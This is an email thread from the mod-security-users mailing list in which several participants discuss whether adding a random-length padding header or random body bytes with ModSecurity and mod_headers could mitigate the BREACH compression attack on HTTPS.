Brian,

thx for the comments. I'm interested too :-)
For now, as its a hobby project for me, I'm trying to get a working mod_headers/mod_security setup to test it out ;-)

Cheers,

Hans

Op 9-8-2013 15:54, Brian Rectanus schreef:
Although, replying to myself here, Adding x's to the header may still work ok as you will not have to worry about the x's being compressed (negating the size fluctuation) when adjusting the payload size (providing SSL compression is disabled, which you should be doing to mitigate).  I'd be interested to hear about your success with this (or lack thereof, heh).

-B


On Fri, Aug 9, 2013 at 6:28 AM, Brian Rectanus <brectanu@gmail.com> wrote:
I believe the issue is HTTP compression, not that the attacker can see the payload.  Compression is performed only on the body in HTTP and why matching guesses make the response smaller.  That is, if your guess matches bytes in the body, then the compression ratio is higher (payload smaller) due to similar bytes of a correct guess.

In addition, to make this work well, you need to inject arbitrary bytes, not just x's.  You need some, but not all the random bytes to match the secret so that the compressed size fluctuates enough to render the attack much more difficult.

It is in interesting idea.  I'd suggest adding a much larger payload of random bytes that match the secret that you are trying to protect.

Cheers,
-B



On Fri, Aug 9, 2013 at 12:04 AM, hans.klunder@xs4all.nl <hans.klunder@xs4all.nl> wrote:
Christian,

I might be wrong, but if the MITM is able to separate the HTTP response
body from the HTTP header then he has already broken the SSL tunnel. So
why bother trying to guess the content then when the attacker can read
it in plain text ?

The way I read it, the attacker has access to another part of the
browser (window, iframe) and is able to inject calls to the target site,
but is not able to view the secured data. Therefore he also needs to be
able to intercept the SSL payload and compare it to the spoofed payload.
And since header and body travel together it should not matter whether
the random bytes are added to header or body.

But again I could be wrong ;-)

Cheers,
Hans
ps. if the attacker is already in the middle and is able to instruct the
browser, he can also instruct the browser to dowload a trojan, but thats
a different topic ;-)




Op 9-8-2013 8:32, Christian Folini schreef:
> Hey Hans,
>
> On Fri, August 9, 2013 7:21 am, hans.klunder@xs4all.nl wrote:
>> You are right that the header won't affect the content length of the body.
>> However if I read the description of the attack
>> (http://www.kb.cert.org/vuls/id/987798) then the man in the middle
>> checks the size of the SSL payload, not the body content length.
> That is not correct.
>
> The description notes:
> "To recover a particular secret in an HTTPS response body, the attacker
> guesses character by character, sending a pair of requests for each guess.
> The correct guess will result in a smaller HTTPS response."
>
> But your initial idea is still valid. You just need to inject your random
> content in the response body and among the headers.
>
> Ahoj,
>
> Christian
>
>
>
>> As the header is part of the SSL payload, varying the header would alter
>> the SSL payload size and therefore blind the MITM :-)
>>
>> Cheers,
>>
>> Hans
>>
>> Op 7-8-2013 23:27, Josh Amishav-Zlatin schreef:
>>> On Wed, Aug 7, 2013 at 11:02 PM, hans.klunder@xs4all.nl
>>> <mailto:hans.klunder@xs4all.nl> <hans.klunder@xs4all.nl
>>> <mailto:hans.klunder@xs4all.nl>> wrote:
>>>
>>>      Josh,
>>>
>>>      thanks for your answer.
>>>
>>>      The number of x's should be random (say between 1 and 80) to
>>>      ensure that the response size differs (its an attempt to tackle
>>>      the BREACH SSL attack ;-))
>>>
>>>
>>> Hi Hans,
>>>
>>> I may be completely off but injecting a random header value does not
>>> effect the content-length value. I think you need to inject a random
>>> number of bytes to the response body.
>>>
>>> --
>>>   - Josh
>>>
>>>
>>>      The setenv seems to be doable by exec-ing a lua script, but I was
>>>      wondering if there was a cleaner way.
>>>
>>>      Cheers,
>>>
>>>      Hans
>>>
>>>
>>>
>>>
>>>      Op 7-8-2013 21:38, Josh Amishav-Zlatin schreef:
>>>>      On Wed, Aug 7, 2013 at 7:30 PM, hans.klunder@xs4all.nl
>>>>      <mailto:hans.klunder@xs4all.nl> <hans.klunder@xs4all.nl
>>>>      <mailto:hans.klunder@xs4all.nl>> wrote:
>>>>
>>>>          Hi,
>>>>
>>>>          I'm rather new to mod_security
>>>>
>>>>          I'd like to insert a variable sized header on responses
>>>>
>>>>          e.g:
>>>>          X-padding: xxxx
>>>>          or
>>>>          X-padding: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
>>>>          etc
>>>>
>>>>          where the number of x-s randomly differs per response.
>>>>
>>>>          Is this possible with a standard rule or would I need to
>>>>          define a custom
>>>>          function for this ?
>>>>
>>>>
>>>>      Hi Hans,
>>>>
>>>>      How do you decide how many x's are appropriate for each response?
>>>>      Depending on the implementation, you could use a combination of
>>>>      the ModSecurity setenv action and a ModHeaders rule to inject the
>>>>      header.
>>>>
>>>>      --
>>>>       - Josh
>>>>
>>>>
>>>>          KR,
>>>>          Hans
>>>>
>>>>
>>>>          ------------------------------------------------------------------------------
>>>>          Get 100% visibility into Java/.NET code with AppDynamics Lite!
>>>>          It's a free troubleshooting tool designed for production.
>>>>          Get down to code-level detail for bottlenecks, with <2%
>>>> overhead.
>>>>          Download for free and get started troubleshooting in minutes.
>>>>          http://pubads.g.doubleclick.net/gampad/clk?id=48897031&iu=/4140/ostg.clktrk
>>>>          _______________________________________________
>>>>          mod-security-users mailing list
>>>>          mod-security-users@lists.sourceforge.net
>>>>          <mailto:mod-security-users@lists.sourceforge.net>
>>>>          https://lists.sourceforge.net/lists/listinfo/mod-security-users
>>>>          Commercial ModSecurity Rules and Support from Trustwave's
>>>>          SpiderLabs:
>>>>          http://www.modsecurity.org/projects/commercial/rules/
>>>>          http://www.modsecurity.org/projects/commercial/support/
>>>>
>>>>
>>>>
>>>>
>>>>      ------------------------------------------------------------------------------
>>>>      Get 100% visibility into Java/.NET code with AppDynamics Lite!
>>>>      It's a free troubleshooting tool designed for production.
>>>>      Get down to code-level detail for bottlenecks, with <2% overhead.
>>>>      Download for free and get started troubleshooting in minutes.
>>>>      http://pubads.g.doubleclick.net/gampad/clk?id=48897031&iu=/4140/ostg.clktrk
>>>>
>>>>
>>>>      _______________________________________________
>>>>      mod-security-users mailing list
>>>>      mod-security-users@lists.sourceforge.net
>>>> <mailto:mod-security-users@lists.sourceforge.net>
>>>>      https://lists.sourceforge.net/lists/listinfo/mod-security-users
>>>>      Commercial ModSecurity Rules and Support from Trustwave's
>>>> SpiderLabs:
>>>>      http://www.modsecurity.org/projects/commercial/rules/
>>>>      http://www.modsecurity.org/projects/commercial/support/
>>>
>>>      ------------------------------------------------------------------------------
>>>      Get 100% visibility into Java/.NET code with AppDynamics Lite!
>>>      It's a free troubleshooting tool designed for production.
>>>      Get down to code-level detail for bottlenecks, with <2% overhead.
>>>      Download for free and get started troubleshooting in minutes.
>>>      http://pubads.g.doubleclick.net/gampad/clk?id=48897031&iu=/4140/ostg.clktrk
>>>      _______________________________________________
>>>      mod-security-users mailing list
>>>      mod-security-users@lists.sourceforge.net
>>>      <mailto:mod-security-users@lists.sourceforge.net>
>>>      https://lists.sourceforge.net/lists/listinfo/mod-security-users
>>>      Commercial ModSecurity Rules and Support from Trustwave's
>>> SpiderLabs:
>>>      http://www.modsecurity.org/projects/commercial/rules/
>>>      http://www.modsecurity.org/projects/commercial/support/
>>>
>>>
>>>
>>>
>>> ------------------------------------------------------------------------------
>>> Get 100% visibility into Java/.NET code with AppDynamics Lite!
>>> It's a free troubleshooting tool designed for production.
>>> Get down to code-level detail for bottlenecks, with <2% overhead.
>>> Download for free and get started troubleshooting in minutes.
>>> http://pubads.g.doubleclick.net/gampad/clk?id=48897031&iu=/4140/ostg.clktrk
>>>
>>>
>>> _______________________________________________
>>> mod-security-users mailing list
>>> mod-security-users@lists.sourceforge.net
>>> https://lists.sourceforge.net/lists/listinfo/mod-security-users
>>> Commercial ModSecurity Rules and Support from Trustwave's SpiderLabs:
>>> http://www.modsecurity.org/projects/commercial/rules/
>>> http://www.modsecurity.org/projects/commercial/support/
>> ------------------------------------------------------------------------------
>> Get 100% visibility into Java/.NET code with AppDynamics Lite!
>> It's a free troubleshooting tool designed for production.
>> Get down to code-level detail for bottlenecks, with <2% overhead.
>> Download for free and get started troubleshooting in minutes.
>> http://pubads.g.doubleclick.net/gampad/clk?id=48897031&iu=/4140/ostg.clktrk_______________________________________________
>> mod-security-users mailing list
>> mod-security-users@lists.sourceforge.net
>> https://lists.sourceforge.net/lists/listinfo/mod-security-users
>> Commercial ModSecurity Rules and Support from Trustwave's SpiderLabs:
>> http://www.modsecurity.org/projects/commercial/rules/
>> http://www.modsecurity.org/projects/commercial/support/
>>
>
>
> ------------------------------------------------------------------------------
> Get 100% visibility into Java/.NET code with AppDynamics Lite!
> It's a free troubleshooting tool designed for production.
> Get down to code-level detail for bottlenecks, with <2% overhead.
> Download for free and get started troubleshooting in minutes.
> http://pubads.g.doubleclick.net/gampad/clk?id=48897031&iu=/4140/ostg.clktrk
> _______________________________________________
> mod-security-users mailing list
> mod-security-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/mod-security-users
> Commercial ModSecurity Rules and Support from Trustwave's SpiderLabs:
> http://www.modsecurity.org/projects/commercial/rules/
> http://www.modsecurity.org/projects/commercial/support/


------------------------------------------------------------------------------
Get 100% visibility into Java/.NET code with AppDynamics Lite!
It's a free troubleshooting tool designed for production.
Get down to code-level detail for bottlenecks, with <2% overhead.
Download for free and get started troubleshooting in minutes.
http://pubads.g.doubleclick.net/gampad/clk?id=48897031&iu=/4140/ostg.clktrk
_______________________________________________
mod-security-users mailing list
mod-security-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/mod-security-users
Commercial ModSecurity Rules and Support from Trustwave's SpiderLabs:
http://www.modsecurity.org/projects/commercial/rules/
http://www.modsecurity.org/projects/commercial/support/




------------------------------------------------------------------------------
Get 100% visibility into Java/.NET code with AppDynamics Lite!
It's a free troubleshooting tool designed for production.
Get down to code-level detail for bottlenecks, with <2% overhead. 
Download for free and get started troubleshooting in minutes. 
http://pubads.g.doubleclick.net/gampad/clk?id=48897031&iu=/4140/ostg.clktrk


_______________________________________________
mod-security-users mailing list
mod-security-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/mod-security-users
Commercial ModSecurity Rules and Support from Trustwave's SpiderLabs:
http://www.modsecurity.org/projects/commercial/rules/
http://www.modsecurity.org/projects/commercial/support/